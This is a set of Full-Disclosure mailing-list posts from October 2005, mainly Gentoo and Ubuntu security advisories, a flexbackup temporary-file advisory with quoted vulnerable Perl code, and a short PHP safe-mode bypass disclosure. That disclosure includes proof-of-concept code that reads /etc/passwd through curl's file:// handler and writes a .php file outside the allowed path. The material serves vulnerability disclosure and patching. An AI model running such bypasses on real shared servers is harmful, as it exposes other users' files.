[Full-disclosure] [ GLSA 200510-14 ] Perl, Qt-UnixODBC, CMake: RUNPATH issues
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200510-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: Perl, Qt-UnixODBC, CMake: RUNPATH issues Date: October 17, 2005 Bugs: #105719, #105721, #106678 ID: 200510-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple packages suffer from RUNPATH issues that may allow users in the portage group to escalate privileges. Background == Perl is a stable, cross-platform programming language created by Larry Wall. Qt-UnixODBC is an ODBC library for Qt. CMake is a cross-platform build environment. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-lang/perl 5.8.7-r1 = 5.8.7-r1 *= 5.8.6-r6 2 dev-db/qt-unixodbc 3.3.4-r1 = 3.3.4-r1 3 dev-util/cmake 2.2.0-r1 = 2.2.0-r1 *= 2.0.6-r1 --- 3 affected packages on all of their supported architectures. --- Description === Some packages may introduce insecure paths into the list of directories that are searched for libraries at runtime. Furthermore, packages depending on the MakeMaker Perl module for build configuration may have incorrectly copied the LD_RUN_PATH into the DT_RPATH. Impact == A local attacker, who is a member of the portage group, could create a malicious shared object in the Portage temporary build directory that would be loaded at runtime by a dependent executable, potentially resulting in privilege escalation. Workaround == Only grant portage group rights to trusted users. Resolution == All Perl users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose dev-lang/perl All Qt-UnixODBC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-db/qt-unixodbc-3.3.4-r1 All CMake users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose dev-util/cmake Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200510-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] flexbackup default config insecure temporary file creation
# flexbackup default config insecure temporary file creation Vendor: http://flexbackup.sourceforge.net/ Advisory: http://www.zataz.net/adviso/flexbackup-09192005.txt Vendor informed: yes Exploit available: yes Impact : low Exploitation : low # The vulnerabilities ared due to insecure temporary files creations due to a default config. They are symlink attacks to create arbitrary files with the privileges of the user running the affected script, sensitive informations disclosure, possible local or remote arbitrary commands execution. ## Versions: ## flexbackup = 1.2.1 ## Solution: ## Change default config $tmpdir # Timeline: # Discovered : 2005-09-06 Vendor notified : 2005-09-19 Vendor response : none Vendor fix : none Vendor Sec report ([EMAIL PROTECTED]) : 2005-09-30 Disclosure : 2005-10-15 # Technical details : # Vulnerable code : - * In /etc/flexbackup.conf : $tmpdir = '/tmp'; * Into flexbackup : checkvar(\$cfg::tmpdir,'tmpdir','exist','/tmp'); If tmpdir is not defined /tmp is used by default, but here into conf file tmpdir is by default set to /tmp 5229 my $tmp_script = $cfg::tmpdir/buftest.$host.$PROCESS_ID.sh; 5236 # Create a script which tests the buffer program 5237 open(SCR, $tmp_script) || die; 5238 print SCR #!/bin/sh\n; 5239 print SCR tmp_data=/tmp/bufftest\$\$.txt\n; 5240 print SCR tmp_err=/tmp/bufftest\$\$.err\n; 5241 print SCR echo testme \$tmp_data\n; 5242 print SCR $buffer_cmd /dev/null 2 \$tmp_err \$tmp_data\n; 5243 print SCR res=\$?\n; 5244 print SCR out=\`cat \$tmp_err\`\n; 5245 print SCR if [ \$res -eq 0 ]; then\n; 5246 print SCRecho successful\n; 5247 print SCR else\n; 5248 print SCRecho \unsuccessful: exit code \$res: \$out\ \n; 5249 print SCR fi\n; 5250 print SCR rm -f \$tmp_data \$tmp_err\n; 5251 close(SCR); Here we have possible symlink attack (race condition), and also possibility to create a untrusted script into the tmp_script (race condition). The script how is created is also vulnerable to possible symlink attack (race condition). 5253 if ($host eq 'localhost') { 5254 print $::msg | Checking '$cfg::buffer' on this machine... ; 5255 $pipecmd = sh $tmp_script ; 5256 } else { 5257 print $::msg | Checking '$cfg::buffer' on host $host... ; 5258 $pipecmd = cat $tmp_script | ($::remoteshell $host 'cat $tmp_script; sh $tmp_script; rm -f $tmp_script'); We see here that the untrusted script could be executed on localhost or remote host. 5446 my $tmp1 = $cfg::tmpdir/test1.$PROCESS_ID; 5447 my $tmp2 = $cfg::tmpdir/test2.$PROCESS_ID; 5448 my $tmp3 = $cfg::tmpdir/test3.$PROCESS_ID; Here the $cfg::pad_blocks should be false to exploit the possible symlink attack (race condition). By default in the conf file pad_blocks is true. No risk if no configuration modification. 359 if (defined($::pkgdelta)) { 360 if (defined($::local)) { 361 list_packages('localhost'); 362 find_packaged_files('localhost'); 363 find_changed_files('localhost'); 364 } 365 foreach my $host (keys %::remotehosts) { 366 list_packages($host); 367 find_packaged_files($host); 368 find_changed_files($host); 369 } 370 $::pkgdelta_filelist = $cfg::tmpdir/pkgdelta.$PROCESS_ID; 371 line(); 372 } Here we have possible symlink attack (race condition) 619 my $exitscript = $cfg::tmpdir/collectexit.$PROCESS_ID.sh; 620 my $result = $cfg::tmpdir/exitstatus.$PROCESS_ID; 841 unlink($result); 842 open(SCR, $exitscript) || die; 843 print SCR '#!/bin/sh' . \n; 844 print SCR '$@' . \n;; 845 print SCR '[ $? = 0 ] || echo $@ ' . $result . \n; 846 close(SCR); 847 chmod(0755, $exitscript); 848 849 push(@cmds, [ ! -e $result ]); 850 } This one is more difficult to race. # Related : # Bug report : http://bugs.gentoo.org/show_bug.cgi?id=105000 CVE : CAN-2005-2965 # Credits : # Eric Romang ([EMAIL PROTECTED] - ZATAZ Audit) - Gentoo Security Scout Thxs to Gentoo Security Team. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-206-1] Lynx vulnerability
=== Ubuntu Security Notice USN-206-1 October 17, 2005 lynx vulnerability CAN-2005-3120 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: lynx The problem can be corrected by upgrading the affected package to version 2.8.5-1ubuntu1.1 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04 (for Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Ulf Harnhammar discovered a remote vulnerability in Lynx when connecting to a news server (NNTP). The function that added missing escape chararacters to article headers did not check the size of the target buffer. Specially crafted news entries could trigger a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the user running lynx. In order to exploit this, the user is not even required to actively visit a news site with Lynx since a malicious HTML page could automatically redirect to an nntp:// URL with malicious news items. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz Size/MD5:17668 c5251ad9cead60e416cf21a461371877 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc Size/MD5: 620 4b4310912f7f76fe01cf8312707be244 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb Size/MD5: 1882872 8be361fa3eead1e76cbbf2426c255c8b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb Size/MD5: 1833368 d481856973186dd5d432e1102c49a917 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb Size/MD5: 1878484 1496a6331a4666295bd89703e509037a Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz Size/MD5:18015 6171994c6c8f67d84267aa69d00ba292 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc Size/MD5: 626 08ff9f5a955222f051e4e78101ef7c40 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb Size/MD5: 1881886 74bc70c3731c903e69fd74eb0a6d2d68 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb Size/MD5: 1832038 f2e333289856566f93f19ca8fd0c5dfd powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb Size/MD5: 1878380 6440d4eae5fadef31aaf21c5396ef401 Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz Size/MD5:18015 0f7b6e508094dabd59bee9018b368523 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc Size/MD5: 626 2a90195b05000a7f318eb04386d1ad1c http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb Size/MD5: 1901120 c2e0da03f20b892aaea81d0f0588f7b1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb Size/MD5: 1833214 7c021c0b0667d3aedc8479579d52e5ad powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb Size/MD5: 1881080 5ef72d193817f616e99f01113f6053dd signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-207-1] PHP vulnerability
=== Ubuntu Security Notice USN-207-1 October 17, 2005 php4 vulnerability CAN-2005-3054 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) The following packages are affected: libapache-mod-php4 libapache2-mod-php4 The problem can be corrected by upgrading the affected package to version 4:4.3.8-3ubuntu7.13 (for Ubuntu 4.10), or 4:4.3.10-10ubuntu4.2 (for Ubuntu 5.04). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A bug has been found in the handling of the open_basedir directive handling. Contrary to the specification, the value of open_basedir was handled as a prefix instead of a proper directory name even if it was terminated by a slash ('/'). For example, this allowed PHP scripts to access the directory /home/user10 when open_basedir was configured to '/home/user1/'. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.diff.gz Size/MD5: 620743 3b06c0da0313bc59be31ac77ead260bc http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8-3ubuntu7.13.dsc Size/MD5: 1626 031af3bb3149f3f4e651a1582d9aee09 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.8.orig.tar.gz Size/MD5: 4832570 dd69f8c89281f088eadf4ade3dbd39ee Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.8-3ubuntu7.13_all.deb Size/MD5: 332792 ef203ed6e04985389038a2668e2b2bae http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-pear_4.3.8-3ubuntu7.13_all.deb Size/MD5: 334636 40cb1635e3ed9860d210cb5054e76332 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 1689722 cdeaf5cd97840a91b346ff121e00e291 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 3198778 8cad2a9376b8483ab6873255274a258f http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:17270 321f4676bd3c2bc286e1a726a93ab4c9 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:40434 e058a0198eafea4d8a322f84aa33bb6e http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-gd_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:33612 ad726de3dfdbcacdcde3d90cdf851770 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-ldap_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:21236 2f0ab9a2891bbaf322c67e88b65f4c7a http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mcal_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:18406 f37ed15fb35f433726922d67d0463438 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mhash_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 7992 8b013d8ee95fb7563aaef62e9c05251e http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-mysql_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:23108 7b3c7f8e89c97557498189719ef30ec0 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-odbc_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:28326 ad745d29d153db18995099efafdd3128 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-recode_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 7618 aa19f54e0d7294cbf5cb1f8f976963f0 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-snmp_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:12970 3e592760088678bb91e3767762bc43f5 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-sybase_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:21512 a3190823cdb28c7d27da7a5f1f260569 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-xslt_4.3.8-3ubuntu7.13_amd64.deb Size/MD5:17252 219742cd538690f92d24a82c074fba28 http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4_4.3.8-3ubuntu7.13_amd64.deb Size/MD5: 1705532 9f6543c2bad3f2a1eae0175ed4938c91 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.8-3ubuntu7.13_i386.deb Size/MD5: 1631536 b533fecf692aa471bbdc7c2125ed1e3f http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.8-3ubuntu7.13_i386.deb Size/MD5: 3044892 60f5e35863ed1210762dd10cc245a8ff http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-curl_4.3.8-3ubuntu7.13_i386.deb Size/MD5:16852 fc06a8fc17ff7d820874ea9be1bcc93c http://security.ubuntu.com/ubuntu/pool/universe/p/php4/php4-domxml_4.3.8-3ubuntu7.13_i386.deb Size/MD5:35556 c3b525c920b3d45c332e4ae90e5ba3d3
[Full-disclosure] [USN-208-1] graphviz vulnerability
=== Ubuntu Security Notice USN-208-1 October 17, 2005 graphviz vulnerability CAN-2005-2965 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 (Hoary Hedgehog) The following packages are affected: graphviz The problem can be corrected by upgrading the affected package to version 2.2-1ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Javier Fernández-Sanguino Peña discovered that the dotty tool created and used temporary files in an insecure way. A local attacker could exploit this with a symlink attack to create or overwrite arbitrary files with the privileges of the user running dotty. Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.diff.gz Size/MD5: 207632 5e836a324f059215f8d0daaa9d469107 http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1.dsc Size/MD5: 788 7c934df6c6a84e937a7060d9743d1c29 http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2.orig.tar.gz Size/MD5: 4379295 9275d30695a5c22f360acbef7b85acd3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_amd64.deb Size/MD5: 147494 2b23526fde607848990ee8b931ea9e0e http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_amd64.deb Size/MD5: 1079078 846c09a610e9c7533c34be24ffd35524 http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_amd64.deb Size/MD5: 1026506 9f08f1dba4f6e94320600d5c4d043d83 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_i386.deb Size/MD5: 147500 beb9f9a7863864a0da2c829eb4688793 http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_i386.deb Size/MD5: 1079084 58c7bd99908e4d61e946dd82b7000f12 http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_i386.deb Size/MD5: 947778 7e0fe2c149954e64cc6fdceaa5ae5bec powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-dev_2.2-1ubuntu0.1_powerpc.deb Size/MD5: 147508 2c786f652e59e9379e120d7065b5bca5 http://security.ubuntu.com/ubuntu/pool/universe/g/graphviz/graphviz-doc_2.2-1ubuntu0.1_powerpc.deb Size/MD5: 1079120 e20fb8adb1c98c784dd5016fda1df8d3 http://security.ubuntu.com/ubuntu/pool/main/g/graphviz/graphviz_2.2-1ubuntu0.1_powerpc.deb Size/MD5: 1075524 2d189fbb333fe89d00dd48a16dc27fc1 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200510-16 ] phpMyAdmin: Local file inclusion vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200510-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: phpMyAdmin: Local file inclusion vulnerability Date: October 17, 2005 Bugs: #108939 ID: 200510-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis phpMyAdmin contains a local file inclusion vulnerability that may lead to the execution of arbitrary code. Background == phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the web. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 dev-db/phpmyadmin 2.6.4_p2 = 2.6.4_p2 Description === Maksymilian Arciemowicz reported that in libraries/grab_globals.lib.php, the $__redirect parameter was not correctly validated. Systems running PHP in safe mode are not affected. Impact == A local attacker may exploit this vulnerability by sending malicious requests, causing the execution of arbitrary code with the rights of the user running the web server. Workaround == Run PHP in safe mode. Resolution == All phpMyAdmin users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-db/phpmyadmin-2.6.4_p2 References == [ 1 ] PMASA-2005-4 http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-4 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200510-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpezWirBvgU6.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-208-1] SSH server vulnerability
=== Ubuntu Security Notice USN-208-1 October 17, 2005 openssh vulnerability CAN-2005-2798 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) The following packages are affected: openssh-server The problem can be corrected by upgrading the affected package to version 1:3.8.1p1-11ubuntu3.2 (for Ubuntu 4.10), or 1:3.9p1-1ubuntu2.1 (for Ubuntu 5.04). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: An information disclosure vulnerability has been found in the SSH server. When the GSSAPIAuthentication option was enabled, the SSH server could send GSSAPI credentials even to users who attempted to log in with a method other than GSSAPI. This could inadvertently expose these credentials to an untrusted user. Please note that this does not affect the default configuration of the SSH server. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.diff.gz Size/MD5: 145915 b3fde6ad57fa71c6fedd0d857a41b98d http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.dsc Size/MD5: 878 24b7a0d1b0bc1b12b4bfcdbe6523175f http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1.orig.tar.gz Size/MD5: 795948 9ce6f2fa5b2931ce2c4c25f3af9ad50d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_3.8.1p1-11ubuntu3.2_all.deb Size/MD5:30068 9ef84fcec461c2890a1623499383b845 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb Size/MD5: 159440 464c3d1ddad5e743c3f87fab0801bd91 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_amd64.deb Size/MD5: 524028 51bda380ea97ef5d49d475b4d210fb6d http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb Size/MD5: 176150 f0456146f631cb925407693de6c707ae http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_amd64.deb Size/MD5: 263790 a5014d5e2e28be860944fee7087c2d30 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_amd64.deb Size/MD5:53286 933c38274907edc3033e5728beb8a7f0 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_i386.udeb Size/MD5: 133700 91e3983782270ba83ead5fdf75cf6056 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_i386.deb Size/MD5: 473980 57c5dd711cb4bba5af54b377ddf25727 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_i386.udeb Size/MD5: 146854 94bae5597a13d613d1a7fe6d34e8312c http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_i386.deb Size/MD5: 241586 3761cc46ab91630196103390b86d36f4 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_i386.deb Size/MD5:52956 35adb2d5dafd2b25d0aaa73c87b8231c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb Size/MD5: 151096 34eaad307c336ec22cdd062ab8343918 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_powerpc.deb Size/MD5: 520822 be831a5152a07823c8a3642de79c23c3 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb Size/MD5: 160176 aae5f5a422bc2086c78581b05f6eb71b http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_powerpc.deb Size/MD5: 257946 0960bfb03e1682d28086d5b11bc55f51 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_powerpc.deb Size/MD5:54404 5729a05da0f88afe145a38ac80c92ae5 Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.diff.gz Size/MD5: 139063 63d2f62b292d2ac8baec90117878dbbd http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.dsc Size/MD5: 866 a4fce3d18d282f646942b15fb7a26915 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1.orig.tar.gz Size/MD5: 832804 530b1dcbfe7a4a4ce4959c0775b85a5a Architecture independent packages:
[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities
There is a vulnerability (Safedir Restriction Bypass)identified within the GD extension affectingthe following functions:- imagegif()- imagepng()- imagejpeg()in /ext/gd/gd.c line 1647 Which is now fixed in the cvshttp://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786 POC: with an image like http://81.57.125.106/~slythers/file.gif ?php $im = imagecreatefromgif(file.gif); imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');?curl openbasedir and safemode bypass. POC: ?php mkdir(./.$_SERVER[SCRIPT_NAME].?);$ch = curl_init(file://.$_SERVER[SCRIPT_FILENAME].?/../../../../../../../../../../../etc/passwd ); $file=curl_exec($ch); echo $file; ? As you notice, we can bypass the safedir which leads to access to anyfiles on any shared servers.This is fixed in the cvs. [EMAIL PROTECTED] greets: david coallier [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local Denial of Service
On Thu, 13 Oct 2005, Piotr Bania wrote: Kerio Technologies Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local denial of service by Piotr Bania [EMAIL PROTECTED] Part of the problem here is that KPF has reached end of life and will no longer be developed. -- Paul Laudanski, Microsoft MVP Windows-Security CastleCops(SM), http://castlecops.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/